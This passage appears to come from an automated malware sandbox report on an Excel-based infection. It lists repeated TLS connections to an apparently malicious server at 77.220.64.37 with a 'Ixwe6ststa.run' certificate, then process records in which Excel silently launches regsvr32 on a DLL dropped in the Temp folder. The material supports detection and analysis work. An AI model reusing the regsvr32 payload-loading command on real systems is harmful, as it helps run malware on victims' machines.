                                                                                                  Jan 11, 2021 18:25:07.524579048 CET77.220.64.37443192.168.2.2249250CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:09.613312960 CET77.220.64.37443192.168.2.2249254CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:11.690589905 CET77.220.64.37443192.168.2.2249258CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:13.871499062 CET77.220.64.37443192.168.2.2249262CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:16.326149940 CET77.220.64.37443192.168.2.2249266CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:18.418039083 CET77.220.64.37443192.168.2.2249270CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:20.523107052 CET77.220.64.37443192.168.2.2249274CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:22.581988096 CET77.220.64.37443192.168.2.2249278CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:24.690195084 CET77.220.64.37443192.168.2.2249282CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:26.839868069 CET77.220.64.37443192.168.2.2249286CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:28.931385040 CET77.220.64.37443192.168.2.2249290CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:31.688611984 CET77.220.64.37443192.168.2.2249294CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:33.865890980 CET77.220.64.37443192.168.2.2249298CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:35.949764013 CET77.220.64.37443192.168.2.2249302CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:38.059653044 CET77.220.64.37443192.168.2.2249306CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:40.171828032 CET77.220.64.37443192.168.2.2249310CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:42.254714966 CET77.220.64.37443192.168.2.2249314CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:44.393404961 CET77.220.64.37443192.168.2.2249318CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:46.446501017 CET77.220.64.37443192.168.2.2249322CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:51.514472961 CET77.220.64.37443192.168.2.2249326CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:53.597985029 CET77.220.64.37443192.168.2.2249330CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:55.689353943 CET77.220.64.37443192.168.2.2249334CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:57.790465117 CET77.220.64.37443192.168.2.2249338CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:59.870026112 CET77.220.64.37443192.168.2.2249342CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:01.948946953 CET77.220.64.37443192.168.2.2249346CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:04.052505970 CET77.220.64.37443192.168.2.2249350CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:06.126055002 CET77.220.64.37443192.168.2.2249354CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:08.185564041 CET77.220.64.37443192.168.2.2249358CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:10.258871078 CET77.220.64.37443192.168.2.2249362CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:12.393047094 CET77.220.64.37443192.168.2.2249366CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:14.534567118 CET77.220.64.37443192.168.2.2249370CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:16.626163960 CET77.220.64.37443192.168.2.2249374CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:18.700202942 CET77.220.64.37443192.168.2.2249378CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:20.774575949 CET77.220.64.37443192.168.2.2249382CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:22.866516113 CET77.220.64.37443192.168.2.2249386CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:25.020009995 CET77.220.64.37443192.168.2.2249390CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:27.076272011 CET77.220.64.37443192.168.2.2249394CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:26:29.155452967 CET77.220.64.37443192.168.2.2249398CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Start time:18:23:41
                                                                                                  Start date:11/01/2021
                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                  Imagebase:0x13fc50000
                                                                                                  File size:27641504 bytes
                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:18:23:49
                                                                                                  Start date:11/01/2021
                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
                                                                                                  Imagebase:0xff290000
                                                                                                  File size:19456 bytes
                                                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:18:23:49
                                                                                                  Start date:11/01/2021
                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline: -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
                                                                                                  Imagebase:0x690000
                                                                                                  File size:14848 bytes
                                                                                                  MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Start time:18:24:07
                                                                                                  Start date:11/01/2021
                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2360
                                                                                                  Imagebase:0x13fc60000
                                                                                                  File size:995024 bytes
                                                                                                  MD5 hash:45A078B2967E0797360A2D4434C41DB4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Start time:18:24:07
                                                                                                  Start date:11/01/2021
                                                                                                  Path:C:\Windows\System32\DWWIN.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\dwwin.exe -x -s 2360
                                                                                                  Imagebase:0xff950000
                                                                                                  File size:152576 bytes
                                                                                                  MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >